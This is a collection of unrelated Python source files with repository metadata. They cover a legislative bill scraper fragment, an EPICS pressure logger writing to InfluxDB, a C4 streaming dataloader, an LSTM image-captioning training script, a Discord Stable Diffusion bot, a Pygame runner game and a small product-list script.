url=amendment.attrib["href"],
media_type="application/pdf",
)
try:
votes_link = page.xpath("//a[text() = 'Votes']")[0]
yield from self.scrape_votes(bill, votes_link.attrib["href"])
except IndexError:
# Some bills don't have any votes
pass
for action in these_actions:
date, chamber, page, text = [x.text for x in action.xpath(".//td")]
session_year = self.jurisdiction.legislative_sessions[-1]["start_date"][0:4]
# Session is April -> June. Prefiles look like they're in
# January at earliest.
date += "/{}".format(session_year)
date = dt.datetime.strptime(date, "%m/%d/%Y")
chamber = self._chambers[chamber]
attrs = self.categorizer.categorize(text)
bill.add_action(
description=text,
date=date.strftime("%Y-%m-%d"),
chamber=chamber,
classification=attrs["classification"],
)
yield bill
| openstates/openstates-scrapers | scrapers/la/bills.py | bills.py | py | 12,028 | python | en | code | 820 | github-code | 90 |
71111360937 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 8 16:34:35 2018
@author: bernardo carvalho
https://pypi.org/project/influxdb/
http://influxdb-python.readthedocs.io/en/latest/api-documentation.html#influxdb.DataFrameClient.write_points
"""
import epics
import time
import os
import sys
import json
from datetime import datetime
#from influxdb_client import InfluxDBClient
from influxdb import InfluxDBClient
import numpy as np
sys.path
os.environ['EPICS_CA_ADDR_LIST'] = '192.168.1.110'
os.environ['EPICS_CA_AUTO_ADDR_LIST'] = 'NO'
client = InfluxDBClient('localhost', 8086, 'oper', 'opertok', 'epics_isttok')
client.create_database('epics_isttok')
#client = InfluxDBClient('http://127.0.0.1:8086', username='oper', password='opertok')
#def onChanges(pvname=None, value=None, char_value=None, **kw):
# pass
SCAN_PERIOD = 15
opstate_pv = epics.PV('ISTTOK:central:OPSTATE')
vv_press_pv = epics.PV('ISTTOK:central:VVessel-Pressure')
vv_press_pv.get(timeout=10)
#client.get_list_database()
def on_opstate_change(pvname=None, value=None, char_value=None, timestamp=None, **kw):
print('PV opstate Changed! {} {} {}'.format(pvname, char_value, timestamp))
dt = datetime.fromtimestamp(timestamp)
json_body = [{
"measurement": "central",
"tags": {"OPSTATE": opstate_pv.char_value},
"time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'),
"fields": {"VVessel-Pressure": vv_press_pv.value}
}]
print(json_body)
client.write_points(json_body)
def on_vv_press_change(pvname=None, value=None, char_value=None, timestamp=None, **kw):
print('PV Changed! {} {} {}'.format(pvname, value, timestamp))
#data = [{"measurement": "central", "tags": {"host": "server01"}, "time": "2009-11-10T23:00:00Z", "fields": {
# "value": value }}]
dt = datetime.fromtimestamp(timestamp)
#json_data = json.dumps(data)
json_body = [
{
"measurement": "central",
"tags": {},
"time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'), # "2009-11-10T23:00:00Z",
"fields": {
"VVessel-Pressure": value}
}
]
print(json_body)
# convert to datetime
# https://stackoverflow.com/questions/51014779/how-send-proper-timestamp-to-influxdb-with-influxdb-python
# write_points(points, time_precision=None, database=None, retention_policy=None, tags=None, batch_size=None, protocol=u'json', consistency=None)
client.write_points(json_body)
#client.write('epics_isttok','central', fields={'value': value})
#print('PV Changed! {} {} {}'.format(pvname, value, time.ctime()))
#vv_press_pv.add_callback(on_vv_press_change)
tmp1_press_admission_pv = epics.PV('ISTTOK:central:TMPump1-PressureAdmission')
rpump1_press_pv = epics.PV('ISTTOK:central:RPump1-Pressure')
opstate_pv.add_callback(on_opstate_change)
# https://medium.com/greedygame-engineering/an-elegant-way-to-run-periodic-tasks-in-python-61b7c477b679
while True:
#print('Hello from the Python Demo Service')
pv1_m_data = rpump1_press_pv.get_with_metadata()
pv2_m_data = tmp1_press_admission_pv.get_with_metadata()
pv3_m_data = vv_press_pv.get_with_metadata()
# pv4_m_data = i
opstate_pv.get()
dt = datetime.fromtimestamp(pv1_m_data['timestamp'])
json_body = [{
"measurement": "central",
"tags": {'OPSTATE': opstate_pv.char_value},
"time": dt.strftime('%Y-%m-%dT%H:%M:%SZ'),
"fields": {
"RPump1-Pressure": pv1_m_data['value'],
"TMPump1-PressureAdmission": pv2_m_data['value'],
"VVessel-Pressure": pv3_m_data['value']
}
}]
print(json_body)
client.write_points(json_body)
time.sleep(SCAN_PERIOD)
# valuePrimary2 = epics.caget('ISTTOK:central:RPump2-Pressure')
#valueChamber1 = epics.caget('ISTTOK:central:VVessel-Pressure')
#valueTMPadmission = epics.caget('ISTTOK:central:TMPump1-PressureAdmission')
#now = time.ctime()
# Open database connection
# 19 | ISTTOK:central:VVessel-Pressure
#sql_chamber ="SELECT `smpl_time`, `float_val` FROM `sample` WHERE `channel_id` = 5 " \
"AND `smpl_time` > addtime(now(),'-01:00:00') ORDER BY `smpl_time` DESC LIMIT 100;"
# 21 | ISTTOK:central:RPump1-Pressure
#sql_primary ="SELECT `smpl_time`, `float_val` FROM `sample` WHERE `channel_id` = 6 " \
"AND `smpl_time` > addtime(now(),'-01:00:00') ORDER BY `smpl_time` DESC LIMIT 100;"
# ORDER BY `smpl_time` DESC LIMIT 250;"
# Execute the SQL command
print("result sql1")
# Fetch all the rows in a list of lists.
print("result sql2")
| bernardocarvalho/isttok-epics | epics/isttok_influx.py | isttok_influx.py | py | 4,564 | python | en | code | 0 | github-code | 90 |
5291439568 | import logging
import warnings
from typing import Any, Dict, Optional
from torch.utils.data import DataLoader
from composer.core import DataSpec
from composer.utils import MissingConditionalImportError, dist
log = logging.getLogger(__name__)
__all__ = ['build_streaming_c4_dataloader']
def build_streaming_c4_dataloader(
global_batch_size: int,
remote: str = 's3://mosaicml-internal-dataset-c4/mds/2/',
local: str = '/tmp/mds-cache/mds-c4/',
split: str = 'train',
shuffle: bool = True,
drop_last: bool = True,
tokenizer_name: str = 'bert-base-uncased',
max_seq_len: int = 512,
group_method: str = 'truncate',
mlm: bool = False,
mlm_probability: float = 0.15,
predownload: Optional[int] = 100_000,
keep_zip: Optional[bool] = None,
download_retry: int = 2,
download_timeout: float = 60,
validate_hash: Optional[str] = None,
shuffle_seed: Optional[int] = None,
num_canonical_nodes: Optional[int] = None,
**dataloader_kwargs: Dict[str, Any],
):
"""Builds a :class:`.DataSpec` for the StreamingC4 (Colossal Cleaned Common Crawl) dataset.
Args:
global_batch_size (int): Global batch size.
remote (str): Remote directory (S3 or local filesystem) where dataset is stored.
Default: ``'s3://mosaicml-internal-dataset-c4/mds/2/'``
local (str): Local filesystem directory where dataset is cached during operation.
Default: ``'/tmp/mds-cache/mds-c4/'``
split (str): What split of the dataset to use. Either ``'train'`` or ``'val'``.
Default: ``'train'``.
shuffle (bool): whether to shuffle the dataset. Default: ``True``.
drop_last (bool): whether to drop last samples. Default: ``True``.
tokenizer_name (str): The name of the HuggingFace tokenizer to preprocess text with. Default:
``'bert-base-uncased'``.
max_seq_len (int): The max sequence length of each token sample. Default: ``512``.
group_method (str): How to group text samples into token samples. Currently only `truncate` is supported.
mlm (bool): Whether or not to use masked language modeling. Default: ``False``.
mlm_probability (float): If ``mlm==True``, the probability that tokens are masked. Default: ``0.15``.
predownload (int, optional): Target number of samples ahead to download the shards of while
iterating. Defaults to ``100_000``.
keep_zip (bool, optional): Whether to keep or delete the compressed file when
decompressing downloaded shards. If set to None, keep iff remote is local. Defaults to
``None``.
download_retry (int): Number of download re-attempts before giving up. Defaults to ``2``.
download_timeout (float): Number of seconds to wait for a shard to download before raising
an exception. Defaults to ``60``.
validate_hash (str, optional): Optional hash or checksum algorithm to use to validate
shards. Defaults to ``None``.
shuffle_seed (int, optional): Seed for shuffling, or ``None`` for random seed. Defaults to
``None``.
num_canonical_nodes (int, optional): Canonical number of nodes for shuffling with resumption.
Defaults to ``None``, which is interpreted as the number of nodes of the initial run.
**dataloader_kwargs (Dict[str, Any]): Additional settings for the dataloader (e.g. num_workers, etc.)
"""
warnings.warn(DeprecationWarning('build_streaming_c4_dataloader is deprecated and will be removed in v0.18'))
try:
import transformers
except ImportError as e:
raise MissingConditionalImportError(extra_deps_group='nlp', conda_package='transformers') from e
if global_batch_size % dist.get_world_size() != 0:
raise ValueError(
f'global_batch_size ({global_batch_size}) must be divisible by world_size ({dist.get_world_size()}).')
batch_size = global_batch_size // dist.get_world_size()
try:
from streaming.text import StreamingC4
except ImportError as e:
raise MissingConditionalImportError(extra_deps_group='streaming', conda_package='mosaicml-streaming') from e
dataset = StreamingC4(
tokenizer_name=tokenizer_name,
max_seq_len=max_seq_len,
group_method=group_method,
local=local,
remote=remote,
split=split,
shuffle=shuffle,
predownload=predownload,
keep_zip=keep_zip if keep_zip is not None else False,
download_retry=download_retry,
download_timeout=download_timeout,
validate_hash=validate_hash,
shuffle_seed=shuffle_seed if shuffle_seed is not None else 9176,
num_canonical_nodes=num_canonical_nodes,
batch_size=batch_size,
)
collate_fn = transformers.DataCollatorForLanguageModeling(
tokenizer=dataset.tokenizer,
mlm=mlm,
mlm_probability=mlm_probability,
)
dataloader = DataLoader(
dataset=dataset,
batch_size=batch_size,
drop_last=drop_last,
collate_fn=collate_fn,
**dataloader_kwargs,
)
return DataSpec(dataloader=dataloader)
| mosaicml/composer | composer/datasets/c4.py | c4.py | py | 5,199 | python | en | code | 4,712 | github-code | 90 |
36275889917 | # coding: utf-8
import time, datetime
import os, json
import numpy as np
import matplotlib.pyplot as plt
import nltk
from cs231n.gradient_check import eval_numerical_gradient, eval_numerical_gradient_array
from cs231n.rnn_layers import *
from cs231n.captioning_solver import CaptioningSolver
from cs231n.classifiers.rnn import CaptioningRNN
from cs231n.coco_utils import load_coco_data, sample_coco_minibatch, decode_captions
from cs231n.image_utils import image_from_url
s = time.time()
print(datetime.datetime.now())
plt.rcParams['figure.figsize'] = (10.0, 8.0) # set default size of plots
plt.rcParams['image.interpolation'] = 'nearest'
plt.rcParams['image.cmap'] = 'gray'
def rel_error(x, y):
""" returns relative error """
return np.max(np.abs(x - y) / (np.maximum(1e-8, np.abs(x) + np.abs(y))))
def BLEU_score(gt_caption, sample_caption):
"""
gt_caption: string, ground-truth caption
sample_caption: string, your model's predicted caption
Returns unigram BLEU score.
"""
reference = [x for x in gt_caption.split(' ')
if ('<END>' not in x and '<START>' not in x and '<UNK>' not in x)]
hypothesis = [x for x in sample_caption.split(' ')
if ('<END>' not in x and '<START>' not in x and '<UNK>' not in x)]
BLEUscore = nltk.translate.bleu_score.sentence_bleu([reference], hypothesis, weights = [1])
return BLEUscore
def evaluate_model(model,med_data):
"""
model: CaptioningRNN model
Prints unigram BLEU score averaged over 1000 training and val examples.
"""
BLEUscores ={}
for split in ['train', 'val']:
minibatch = sample_coco_minibatch(med_data, split=split, batch_size=1000)
gt_captions, features, urls = minibatch
gt_captions = decode_captions(gt_captions, data['idx_to_word'])
sample_captions = model.sample(features)
sample_captions = decode_captions(sample_captions, data['idx_to_word'])
total_score = 0.0
for gt_caption, sample_caption, url in zip(gt_captions, sample_captions, urls):
total_score += BLEU_score(gt_caption, sample_caption)
BLEUscores[split] = total_score / len(sample_captions)
for split in BLEUscores:
print('Average BLEU score for %s: %f' % (split, BLEUscores[split]))
max_train = 10000
batch_size=128
num_epochs = 1
data = load_coco_data(pca_features=True)
#np.random.seed(231)
small_data = load_coco_data(max_train=max_train)
############################################################
small_lstm_model = CaptioningRNN(
cell_type='lstm',
word_to_idx=data['word_to_idx'],
input_dim=data['train_features'].shape[1],
hidden_dim=512,
wordvec_dim=256,
dtype=np.float32,
)
small_lstm_solver = CaptioningSolver(small_lstm_model, small_data,
update_rule='adam',
num_epochs=num_epochs,
batch_size=batch_size,
optim_config={
'learning_rate': 5e-3,
},
lr_decay=0.995,
verbose=True, print_every=10,
)
small_lstm_solver.train()
for split in ['train', 'val']:
minibatch = sample_coco_minibatch(small_data, split=split, batch_size=2)
gt_captions, features, urls = minibatch
gt_captions = decode_captions(gt_captions, data['idx_to_word'])
sample_captions = small_lstm_model.sample(features)
sample_captions = decode_captions(sample_captions, data['idx_to_word'])
for gt_caption, sample_caption, url in zip(gt_captions, sample_captions, urls):
plt.imshow(image_from_url(url))
plt.title('%s\n%s\nGT:%s' % (split, sample_caption, gt_caption))
plt.axis('off')
plt.show()
print(split, sample_caption,"\n--->", gt_caption)
evaluate_model(small_lstm_model,small_data)
e = time.time()
print(e-s,"sec")
| hccho2/cs231n-Assignment | assignment3/test-LSTM.py | test-LSTM.py | py | 3,995 | python | en | code | 0 | github-code | 90 |
1622578155 | import logging
class Loggers:
"""
Application's logging interface.
"""
main_name = "ingestation_main_logger"
main_fmt = "%(asctime)s [%(levelname)s]: %(message)s"
console_fmt = f"\n{main_fmt}"
def __init__(self, cli_options: dict):
self.options = cli_options
self.logger = self.define_main_logger()
self.configure_loggers()
def define_main_logger(self) -> logging.Logger:
logger = logging.getLogger(self.main_name)
logger.setLevel(logging.DEBUG)
return logger
def add_handlers(self) -> None:
self.add_console_handler()
def configure_loggers(self) -> None:
self.add_handlers()
def add_console_handler(self) -> None:
handler = logging.StreamHandler()
handler.setFormatter(ColourFormatter(self.console_fmt))
if not self.options["debug"]:
handler.setLevel(logging.INFO)
self.logger.addHandler(handler)
class ColourFormatter(logging.Formatter):
"""
Logging formatter designed to colour console messages.
Overrides level_formats instance variable of logging.Formatter.
Overrides format() instance method of logging.Formatter.
Extends __init__ of logging.Formatter with ANSI escape colour definitions.
"""
def __init__(self, formatter):
super().__init__()
grey = "\x1b[0;38m"
light_green = "\x1b[1;32m"
yellow = "\x1b[0;33m"
red = "\x1b[0;31m"
light_red = "\x1b[1;31m"
reset = "\x1b[0m"
self.level_formats = {
logging.DEBUG: light_green + formatter + reset,
logging.INFO: grey + formatter + reset,
logging.WARNING: yellow + formatter + reset,
logging.ERROR: red + formatter + reset,
logging.CRITICAL: light_red + formatter + reset
}
def format(self, record):
log_fmt = self.level_formats.get(record.levelno)
formatter = logging.Formatter(log_fmt)
return formatter.format(record)
| LegenJCdary/ingeSTation | src/modules/outputs/loggers.py | loggers.py | py | 2,029 | python | en | code | 1 | github-code | 90 |
36437158025 | # -*- coding: utf-8 -*-
from typing import Any, Generic, Iterable, Optional, Type, TypeVar, Union
from decimal import Decimal
from enum import Enum
from operator import attrgetter
from pydantic import ValidationError
import requests
from .config import config
from .models import CurrencyInfo, FarmingPoolInfo, PairInfo
class FlatQubeClientError(Exception):
pass
class SortOrder(str, Enum):
ascend = 'ascend'
descend = 'descend'
TData = TypeVar('TData', bound=Union[CurrencyInfo, PairInfo])
class SortBy(Generic[TData]):
"""Generic sort by
"""
def __call__(self: Enum,
iterable: Iterable[TData],
*,
order: SortOrder = SortOrder.descend,
inplace: bool = False) -> Optional[list[TData]]:
"""Sort the given sequency of data by the sort option
"""
key = attrgetter(self.name)
reverse = True if order == SortOrder.descend else False
if inplace:
if isinstance(iterable, list):
iterable.sort(key=key, reverse=reverse)
else:
raise TypeError("The argument must be a list for sorting inplace.")
return None
else:
return sorted(iterable, key=key, reverse=reverse)
class CurrencySortBy(SortBy[CurrencyInfo], str, Enum):
"""Currencies sort by
"""
price = 'price'
price_change = 'price-ch'
tvl = 'tvl'
tvl_change = 'tvl-ch'
volume_24h = 'vol24h'
volume_change_24h = 'vol24h-ch'
volume_7d = 'vol7d'
transaction_count_24h = 'trans24h'
fee_24h = 'fee24h'
class PairSortBy(SortBy[PairInfo], str, Enum):
"""Pairs sort by
"""
fee_24h = 'fee24h'
fee_7d = 'fee7d'
fee_all_time = 'fee-all-time'
left_locked = 'left-locked'
right_locked = 'right-locked'
left_price = 'left-price'
right_price = 'right-price'
tvl = 'tvl'
tvl_change = 'tvl-ch'
volume_24h = 'vol24h'
volume_24h_change = 'vol24h-ch'
volume_7d = 'vol7d'
class FlatQubeClient:
"""FlatQube REST API client
"""
def __init__(self):
self._swap_api_url = config.api_urls.swap_indexer.rstrip('/')
self._farming_api_url = config.api_urls.farming_indexer.rstrip('/')
self._session: Optional[requests.Session] = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self._session:
self._session.close()
self._session = None
@property
def session(self) -> requests.Session:
if not self._session:
self._session = requests.Session()
return self._session
def currency_total_count(self, white_list_url: Optional[str] = None) -> int:
"""Return total currencies on the service or a white list
"""
return self._get_total_count('currencies', white_list_url=white_list_url)
def all_currencies(self, white_list_url: Optional[str] = None) -> Iterable[CurrencyInfo]:
"""Generator for all currencies from the service or a white list
"""
yield from self._get_currencies(white_list_url=white_list_url)
def whitelist_currencies(self) -> Iterable[CurrencyInfo]:
"""Return Broxus white list currencies
"""
yield from self._get_currencies(white_list_url=config.token_white_list_url)
def currencies(self,
addresses: Iterable[str],
white_list_url: Optional[str] = None,
sort_by: Union[str, CurrencySortBy] = CurrencySortBy.tvl,
sort_order: Union[str, SortOrder] = SortOrder.ascend) -> list[CurrencyInfo]:
"""Get currencies info by addresses
"""
sort_by = CurrencySortBy(sort_by)
sort_order = SortOrder(sort_order)
params = {
'currencyAddresses': list(addresses)
}
currencies = self._get_currencies(
params=params,
white_list_url=white_list_url
)
return sort_by(
currencies,
order=sort_order,
inplace=False,
)
def currency(self, address: str) -> CurrencyInfo:
"""Get currency info by address
"""
api_url = f'{self._swap_api_url}/currencies/{address}'
return self._parse_currency_data(
self._request(self.session.post, api_url)
)
def pair_total_count(self, white_list_url: Optional[str] = None) -> int:
"""Return total pairs on the service or a white list
"""
return self._get_total_count('pairs', white_list_url=white_list_url)
def all_pairs(self,
tvl_ge: Union[None, float, Decimal] = None,
tvl_le: Union[None, float, Decimal] = None,
white_list_url: Optional[str] = None) -> Iterable[PairInfo]:
"""Get info about all pairs on FlatQube
"""
tvl_ge = str(tvl_ge) if tvl_ge else None
tvl_le = str(tvl_le) if tvl_le else None
params = {
'tvlAmountGe': tvl_ge,
'tvlAmountLe': tvl_le,
}
yield from self._get_pairs(params=params, white_list_url=white_list_url)
def whitelist_pairs(self,
tvl_ge: Union[None, float, Decimal] = None,
tvl_le: Union[None, float, Decimal] = None) -> Iterable[PairInfo]:
"""Return Broxus white list pairs
"""
yield from self.all_pairs(
tvl_ge=tvl_ge,
tvl_le=tvl_le,
white_list_url=config.token_white_list_url
)
def pairs(self,
currency_address: str,
currency_addresses: Union[None, str, Iterable[str]] = None,
tvl_ge: Union[None, float, Decimal] = None,
tvl_le: Union[None, float, Decimal] = None,
white_list_url: Optional[str] = None,
sort_by: Union[str, PairSortBy] = PairSortBy.tvl,
sort_order: Union[str, SortOrder] = SortOrder.ascend) -> list[PairInfo]:
"""Get pairs info by given currency addresses
"""
sort_by = PairSortBy(sort_by)
sort_order = SortOrder(sort_order)
if isinstance(currency_addresses, str):
currency_addresses = [currency_addresses]
elif isinstance(currency_addresses, Iterable):
currency_addresses = list(currency_addresses)
tvl_ge = str(tvl_ge) if tvl_ge else None
tvl_le = str(tvl_le) if tvl_le else None
params = {
'currencyAddress': currency_address,
'currencyAddresses': currency_addresses,
'tvlAmountGe': tvl_ge,
'tvlAmountLe': tvl_le,
}
pairs = self._get_pairs(
params=params,
white_list_url=white_list_url
)
return sort_by(
pairs,
order=sort_order,
inplace=False,
)
def pair(self, left_address: str, right_address: Optional[str] = None) -> PairInfo:
"""Get pair info by pool address or left/right currency addresses
"""
base_url = f'{self._swap_api_url}/pairs'
if right_address is None:
api_url = f'{base_url}/address/{left_address}'
else:
api_url = f'{base_url}/left/{left_address}/right/{right_address}'
return self._parse_pair_data(
self._request(self.session.post, api_url)
)
def farmin_pool(self,
pool_address: str,
user_address: Optional[str] = None,
after_zero_balance: bool = True) -> FarmingPoolInfo:
"""Get info about a farming pool
"""
api_url = f'{self._farming_api_url}/farming_pools/{pool_address}'
data = {
'afterZeroBalance': after_zero_balance,
'userAddress': user_address,
}
farming_pool_info = self._request(self.session.post, api_url, data=data)
try:
return FarmingPoolInfo.parse_obj(farming_pool_info)
except ValidationError as err:
raise FlatQubeClientError(f'Cannot parse farming pool info\n{err}') from err
@staticmethod
def _request(method, api_url, data=None):
try:
with method(api_url, json=data) as resp:
resp.raise_for_status()
return resp.json()
except Exception as err:
raise FlatQubeClientError(f'{err}') from err
def _get_total_count(self, name: str, white_list_url: Optional[str] = None):
api_url = f'{self._swap_api_url}/{name}'
data = {
"limit": 0,
"offset": 0,
"whiteListUri": white_list_url,
}
result = self._request(self.session.post, api_url, data=data)
return result['totalCount']
@staticmethod
def _parse_data(name: str, data: dict[str, Any], model_cls: Type[TData]) -> TData:
try:
return model_cls.parse_obj(data)
except ValidationError as err:
raise FlatQubeClientError(f'Cannot parse {name} data "{data}"\n{err}') from err
def _parse_currency_data(self, data: dict[str, Any]) -> CurrencyInfo:
return self._parse_data('currency', data, CurrencyInfo)
def _parse_pair_data(self, data: dict[str, Any]) -> PairInfo:
return self._parse_data('pair', data, PairInfo)
def _get_data(self,
name: str,
params: Optional[dict[str, Any]] = None,
white_list_url: Optional[str] = None) -> Iterable[dict[str, Any]]:
api_url = f'{self._swap_api_url}/{name}'
if not params:
params = {}
data = {
**params,
"limit": config.api_bulk_limit,
"offset": 0,
"whiteListUri": white_list_url,
}
while True:
result = self._request(self.session.post, api_url, data=data)
for info in result[name]:
yield info
offset = data['offset'] + len(result[name])
if offset == result['totalCount']:
break
data['offset'] = offset
def _get_currencies(self,
params: Optional[dict[str, Any]] = None,
white_list_url: Optional[str] = None) -> Iterable[CurrencyInfo]:
for currency_data in self._get_data('currencies', params, white_list_url):
yield self._parse_currency_data(currency_data)
def _get_pairs(self,
params: Optional[dict[str, Any]] = None,
white_list_url: Optional[str] = None) -> Iterable[PairInfo]:
for pair_data in self._get_data('pairs', params, white_list_url):
yield self._parse_pair_data(pair_data)
| espdev/flatqube-client | flatqube/client.py | client.py | py | 10,814 | python | en | code | 2 | github-code | 90 |
71177298217 | import gi
gi.require_version('Gtk', '4.0')
from gi.repository import Gtk, Pango
class DocumentStatsView(Gtk.Box):
def __init__(self):
Gtk.Box.__init__(self)
self.set_orientation(Gtk.Orientation.VERTICAL)
self.get_style_context().add_class('document-stats')
description = Gtk.Label.new(_('These counts are updated after the document is saved.'))
description.set_wrap(True)
description.set_xalign(0)
description.get_style_context().add_class('description')
self.append(description)
self.label_whole_document = Gtk.Label()
self.label_whole_document.set_wrap(True)
self.label_whole_document.set_wrap_mode(Pango.WrapMode.WORD_CHAR)
self.label_whole_document.set_xalign(0)
self.label_whole_document.get_style_context().add_class('stats-paragraph')
self.append(self.label_whole_document)
self.label_current_file = Gtk.Label()
self.label_current_file.set_wrap(True)
self.label_current_file.set_wrap_mode(Pango.WrapMode.WORD_CHAR)
self.label_current_file.set_xalign(0)
self.label_current_file.get_style_context().add_class('stats-paragraph')
self.append(self.label_current_file)
| cvfosammmm/Setzer | setzer/workspace/sidebar/document_stats/document_stats_viewgtk.py | document_stats_viewgtk.py | py | 1,242 | python | en | code | 362 | github-code | 90 |
21366567452 | from diffusers import DiffusionPipeline, DPMSolverMultistepScheduler, StableDiffusionInstructPix2PixPipeline
import torch
import discord
from discord.ext import commands
import io
import PIL
import math
import concurrent.futures
import asyncio
class ImageGenerator(commands.Cog):
def __init__(self, bot):
torch.cuda.empty_cache()
self.bot = bot
self.device_1 = "cuda:0"
self.device_2 = "cuda:1"
self.repo_id_gen = "stabilityai/stable-diffusion-2"
self.pipe_gen = DiffusionPipeline.from_pretrained(self.repo_id_gen, torch_dtype=torch.float16, revision="fp16")
self.pipe_gen.scheduler = DPMSolverMultistepScheduler.from_config(self.pipe_gen.scheduler.config)
self.pipe_gen = self.pipe_gen.to(self.device_1)
self.repo_id_edit = "timbrooks/instruct-pix2pix"
self.pipe_edit = StableDiffusionInstructPix2PixPipeline.from_pretrained(self.repo_id_edit, torch_dtype=torch.float16).to(self.device_2)
def process_image(self, image_bytes):
input_image = PIL.Image.open(io.BytesIO(image_bytes))
input_image = PIL.ImageOps.exif_transpose(input_image)
input_image = input_image.convert("RGB")
width, height = input_image.size
factor = 512 / max(width, height)
factor = math.ceil(min(width, height) * factor / 64) * 64 / min(width, height)
width = int((width * factor) // 64) * 64
height = int((height * factor) // 64) * 64
input_image = PIL.ImageOps.fit(input_image, (width, height), method=PIL.Image.Resampling.LANCZOS)
return input_image
def generate_image_blocking(self, prompt):
with torch.no_grad():
with torch.cuda.device(0):
image = self.pipe_gen(prompt, guidance_scale=9, num_inference_steps=100).images[0]
return image
async def generate_image_async(self, ctx, prompt):
loop = asyncio.get_event_loop()
with concurrent.futures.ThreadPoolExecutor() as pool:
image = await loop.run_in_executor(pool, self.generate_image_blocking, prompt)
return image
@commands.command(aliases=["paint"])
async def generate_image(self, ctx, *, prompt):
"""Generate an image based on the given prompt."""
async with ctx.typing():
image = await self.generate_image_async(ctx, prompt)
if image:
with io.BytesIO() as binary_img:
image.save(binary_img, 'PNG')
binary_img.seek(0)
file = discord.File(binary_img, filename='image.png')
await ctx.send(file=file)
else:
await ctx.send("Unable to generate an image for the given prompt.")
def edit_image_blocking(self, prompt, image):
with torch.no_grad():
with torch.cuda.device(1):
image = self.pipe_edit(prompt, image=image, num_inference_steps=300, image_guidance_scale=1.5, guidance_scale=7).images[0]
return image
async def edit_image_async(self, ctx, prompt, image):
loop = asyncio.get_event_loop()
with concurrent.futures.ThreadPoolExecutor() as pool:
image = await loop.run_in_executor(pool, self.edit_image_blocking, prompt, image)
return image
@commands.command(aliases=["edit"])
async def edit_image(self, ctx, *, prompt):
# Check if there's an attachment (image) in the message
if not ctx.message.attachments:
await ctx.send("Please provide an image attachment.")
return
attachment = ctx.message.attachments[0]
image_bytes = await attachment.read()
image = self.process_image(image_bytes)
async with ctx.typing():
image = await self.edit_image_async(ctx, prompt, image)
if image:
with io.BytesIO() as binary_img:
image.save(binary_img, 'PNG')
binary_img.seek(0)
file = discord.File(binary_img, filename='edit.png')
await ctx.send(file=file)
else:
await ctx.send("Unable to generate an image for the given prompt.")
async def setup_diffusion_client(bot):
if not bot.get_cog("ImageGenerator"):
await bot.add_cog(ImageGenerator(bot))
else:
print("Music cog has already been added.") | Simon-Kotchou/DiscBot | DiffusionClient.py | DiffusionClient.py | py | 4,394 | python | en | code | 1 | github-code | 90 |
27711857886 | # importing the pygame module
import pygame
import random
import os
import time
# initialize the pygame module
pygame.init()
# load and set the logo
logo = pygame.image.load("logo.png")
pygame.display.set_icon(logo)
pygame.display.set_caption("Running Jack")
# screen size
WIDTH = 800
HEIGHT = 600
# colors
YELLOW = (255, 255, 0)
BLACK = (0, 0, 0)
WHITE = (255,255,255)
BLUE = (0, 0, 255)
RED = (255, 0, 0)
# create a surface on screen that has the size of 600 x 400
screen = pygame.display.set_mode((WIDTH, HEIGHT))
#load images in program
runAnimation = [pygame.image.load(os.path.join("player_img", "run1.png")), pygame.image.load(os.path.join("player_img", "run2.png")),
pygame.image.load(os.path.join("player_img", "run3.png")), pygame.image.load(os.path.join("player_img", "run4.png")),
pygame.image.load(os.path.join("player_img", "run5.png")), pygame.image.load(os.path.join("player_img", "run6.png")),
pygame.image.load(os.path.join("player_img", "run7.png")), pygame.image.load(os.path.join("player_img", "run8.png"))]
backgroundIMG = pygame.image.load("bg.png")
car = pygame.image.load("car.png")
# define a variable to control the main loop
running = True
scorefont = pygame.font.SysFont("monospace",32)
# obstacle Position variables
OX = 800
OY = 280
speed = 7
CLOCK = pygame.time.Clock()
# background speed
BX= 800
# score variable
score = 0
def collision():
if (180 >= OX >= 100) or (180 >= OX+200 >= 100):
if character.y >= 275:
screen.blit(scorefont.render("You Lose!",1,BLACK),(325,250))
return False
# player object
class Character:
# person position variables
x = 100
y = 300
jump = False
comedown = False
runcount = 0.5
vel=5
def jumpFunc(self):
# Jumping Mechanism
if self.jump is True:
self.y -= self.vel
if self.y <= 120:
self.jump = False
if self.jump is False and self.y <= 120:
self.comedown = True
if self.comedown is True:
self.y += self.vel
if self.y >= 300:
self.comedown = False
def draw(self):
screen.blit(runAnimation[round(self.runcount % 7)], (self.x, self.y))
self.runcount += 0.13
# surface,color,rectangle [x y width height]
#pygame.draw.rect(screen, BLUE, [self.x, self.y, 20, 50])
character = Character()
firsttime = True
# main loop
while running:
# event handling, gets all event from the event queue
for event in pygame.event.get():
# only do something if the event is of type QUIT
if event.type == pygame.QUIT:
# change the value to False, to exit the main loop
running = False
# character movement
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_UP and character.y >= 300:
character.jump = True
character.jumpFunc()
# background moving mechanism
BX -= 5
if BX < 0:
BX = 800
# obstacle moving mechanism
OX -= speed
if OX < -250:
OX = 800
score += 1
# difficulty level
if 12 > score > 5:
speed = 10
character.vel = 7
if score > 12:
speed = random.randrange(10, 18)
# screen background color and images
screen.fill(WHITE)
screen.blit(backgroundIMG, (BX, 0))
screen.blit(backgroundIMG, (BX-800, 0))
# all display draw calls
text=scorefont.render("Score: %d"%score,1,BLACK)
screen.blit(text,(10,10))
character.draw()
screen.blit(car, (OX, OY))
# detecting collision
if collision() is False:
running = False
# FPS
CLOCK.tick(60)
# whole screen updating
pygame.display.update()
if firsttime is True:
time.sleep(1)
firsttime = False
time.sleep(1)
pygame.quit()
quit()
| muhammadabdullah329/SideScollerPygame | sideScoller.py | sideScoller.py | py | 3,872 | python | en | code | 0 | github-code | 90 |
2430465786 | # 检查档案在不在
import os # operating system
products = []
if os.path.isfile('products.csv'):
print('yes')
#读取档案
with open('products.csv', 'r', encoding = 'utf-8') as f:
for line in f:
if '商品, 价格' in line:
continue #继续
name , price = line.strip().split(',') #先把换行符号去除,再用逗点当作切割的标准
products.append([name, price])
print(products)
else:
print('nope')
#让使用者输入
while True:
name = input('请输入商品名称:')
if name == 'q':
break
price = input('请输入商品价格:')
price = int(price)
p = []
p.append(name) #小清单
p.append(price) #小清单
#也可以将7-9行直接缩成: p = [name, price]
products.append(p) #大清单 (小清单中装入大清单)
#又或者直接缩成products.append([name, price])
print(products)
# products[0][0] #大清单的第0格,小清单的第0格
#印出所有购买纪录
for p in products:
print(p[0], '的价格是$', p[1])
#写入档案
